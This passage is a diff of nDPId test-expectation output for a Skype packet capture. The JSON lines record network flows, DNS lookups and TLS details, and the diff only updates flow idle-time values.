{"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"} +01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431970635325,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970635325,"pkt":"0NQSxnP1PBXCt3IOCABFAAA657QAAEARD4vAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -61,37 +61,37 @@ 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431970635489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970635489,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+K0AQBV0hgaBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAMABBfOIaY="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDdt0AAEARgFnAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDiigAAEARbQ7AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA762oAAEARC9TAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7\/zoAAEAR+APAqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431970635827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970635827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rmUAAEARSNXAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/dFsAAEARgt\/AqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLWNIAAEARnlzAqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLGiMAAEAR3QvAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"} -00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"} +00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"} +00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431970636300,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636300,"pkt":"0NQSxnP1PBXCt3IOCABFAABLV\/cAAEARnzfAqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 